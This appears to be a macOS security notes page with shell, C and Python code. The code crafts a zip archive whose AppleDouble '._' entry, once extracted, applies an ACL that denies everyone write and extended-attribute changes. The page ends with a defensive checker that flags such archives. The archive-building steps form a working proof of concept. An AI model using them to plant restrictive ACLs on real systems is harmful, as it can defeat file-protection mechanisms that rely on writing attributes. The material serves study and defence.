macOS xattr-acls extra stuff
```bash
rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
./get_acls test
ACL for test:
!#acl 1
group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown

ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a
```
```c
// gcc -o get_acls get_acls.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/acl.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
        return 1;
    }

    const char *filepath = argv[1];

    // Read the extended ACL attached to the file
    acl_t acl = acl_get_file(filepath, ACL_TYPE_EXTENDED);
    if (acl == NULL) {
        perror("acl_get_file");
        return 1;
    }

    // Serialize the ACL to its text form ("!#acl 1\n...")
    char *acl_text = acl_to_text(acl, NULL);
    if (acl_text == NULL) {
        perror("acl_to_text");
        acl_free(acl);
        return 1;
    }

    printf("ACL for %s:\n%s\n", filepath, acl_text);

    // Convert acl_text to hexadecimal and print it
    printf("ACL in hex: ");
    for (char *c = acl_text; *c != '\0'; c++) {
        printf("\\x%02x", (unsigned char)*c);
    }
    printf("\n");

    acl_free(acl);
    acl_free(acl_text);
    return 0;
}
```
<details>
<summary>macOS XATTR, ACLs and extra stuff</summary>

In macOS there are several ways to secure files and directories using Extended Attributes (XATTR) and Access Control Lists (ACLs). These techniques can help improve the security of your systems and prevent unwanted access.

### Extended Attributes (XATTR)

XATTR is a way to attach extra metadata to files and directories. It can be used to store specific information about a file, such as who created it or when it was last modified. It can also be used to apply security measures.

### Access Control Lists (ACLs)

ACLs offer a more detailed approach to access control than traditional Unix permissions. With ACLs you can assign specific access rights to different users or groups. This gives finer control over who has access to what on your system.

### Using XATTR and ACLs

To use XATTR and ACLs, you can run the following commands in the terminal:

- To add an XATTR to a file:
```bash
xattr -w myAttribute myValue myFile
```
- To add an ACL to a file:
```bash
chmod +a "user:username allow read,write" myFile
```
By using these techniques, you can improve the security of your macOS system and reduce the risk of unwanted access.

```bash
# Let's add the xattr com.apple.xxx.xxxx with the ACLs
mkdir start
mkdir start/protected
./set_xattr start/protected
echo something > start/protected/something
```
```c
// gcc -o set_xattr set_xattr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/xattr.h>

// List every extended attribute on filepath together with its value
void print_xattrs(const char *filepath) {
    // First call with a NULL buffer returns the size needed for the name list
    ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW);
    if (buflen < 0) {
        perror("listxattr");
        return;
    }

    char *buf = malloc(buflen);
    if (buf == NULL) {
        perror("malloc");
        return;
    }

    buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW);
    if (buflen < 0) {
        perror("listxattr");
        free(buf);
        return;
    }

    printf("All current extended attributes for %s:\n", filepath);
    // The buffer holds consecutive NUL-terminated attribute names
    for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) {
        printf("%s: ", name);
        ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW);
        if (valuelen < 0) {
            perror("getxattr");
            continue;
        }

        char *value = malloc(valuelen + 1);
        if (value == NULL) {
            perror("malloc");
            continue;
        }

        valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW);
        if (valuelen < 0) {
            perror("getxattr");
            free(value);
            continue;
        }

        value[valuelen] = '\0';  // Null-terminate the value
        printf("%s\n", value);
        free(value);
    }

    free(buf);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
        return 1;
    }

    // Text form of the ACL, as printed in hex by get_acls
    const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a";
    const char *filepath = argv[1];

    // Store the ACL text under a placeholder attribute name
    int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0);
    if (result == 0) {
        printf("Extended attribute set successfully.\n\n");
    } else {
        perror("setxattr");
        return 1;
    }

    print_xattrs(filepath);

    return 0;
}
```
</details>
```bash
# Create the AppleDouble file carrying the xattr
ditto -c -k start protected.zip
rm -rf start
# Extract the files
unzip protected.zip
# Replace the xattr name here (had the real name been set earlier, ditto would have destroyed it)
python3 -c "with open('._protected', 'rb+') as f: content = f.read().replace(b'com.apple.xxx.xxxx', b'com.apple.acl.text'); f.seek(0); f.write(content); f.truncate()"
# Zip everything back together
rm -rf protected.zip
zip -r protected.zip protected ._protected
rm -rf protected
rm ._*
# Check if it worked
ditto -x -k --rsrc protected.zip .
xattr -l protected
```
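
A defender-side check for the kind of archive built above, as an added example that is not part of the original page: it lists the `._` AppleDouble members of a zip that carry a `com.apple.acl.text` attribute, so the ACL can be reviewed before the archive is extracted. The attribute-header layout is an assumption taken from XNU's AppleDouble `attr_header`/`attr_entry` structures, and `sample_zip()` builds a constructed archive for the demonstration.

```python
import io
import struct
import zipfile

ACL_XATTR = "com.apple.acl.text"

def appledouble_xattrs(blob):
    """Return {name: value} for the xattrs carried by an AppleDouble '._' file."""
    start = blob.find(b"ATTR")                      # attr_header magic
    if start < 0 or len(blob) < start + 36:
        return {}
    # Assumed attr_header (big-endian): 34 bytes of fields, then u16 num_attrs
    num_attrs = struct.unpack_from(">H", blob, start + 34)[0]
    pos, found = start + 36, {}
    for _ in range(num_attrs):
        if pos + 11 > len(blob):
            break                                   # truncated entry table
        off, length, _flags, namelen = struct.unpack_from(">IIHB", blob, pos)
        name = blob[pos + 11:pos + 11 + namelen].rstrip(b"\0")
        found[name.decode("utf-8", "replace")] = blob[off:off + length]
        pos += (11 + namelen + 3) & ~3              # entries are 4-byte aligned
    return found

def flag_acl_members(zip_bytes):
    """List (member, acl_text) for '._' members that would restore an ACL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.rsplit("/", 1)[-1].startswith("._"):
                acl = appledouble_xattrs(zf.read(info)).get(ACL_XATTR)
                if acl is not None:
                    hits.append((info.filename, acl.decode("utf-8", "replace")))
    return hits

def sample_zip():
    """Constructed archive: 'protected' plus a '._protected' with an ACL xattr."""
    acl = (b"!#acl 1\ngroup:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:"
           b"deny:write,writeattr,writeextattr,writesecurity,chown\n")
    name = ACL_XATTR.encode() + b"\0"
    entry = struct.pack(">IIHB", 152, len(acl), 0, len(name)) + name + b"\0\0"
    head = struct.pack(">II16sH", 0x00051607, 0x00020000, b"Mac OS X        ", 2)
    head += struct.pack(">IIIIII", 9, 50, 102 + len(acl), 2, 152 + len(acl), 0) + bytes(34)
    attr = struct.pack(">4sIIII12sHH", b"ATTR", 0, 152 + len(acl), 152,
                       len(acl), bytes(12), 0, 1)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("protected/something", b"something\n")
        zf.writestr("._protected", head + attr + entry + acl)
    return buf.getvalue()
```

Calling `flag_acl_members(open("protected.zip", "rb").read())` on a real archive returns each flagged member with the ACL text it would apply.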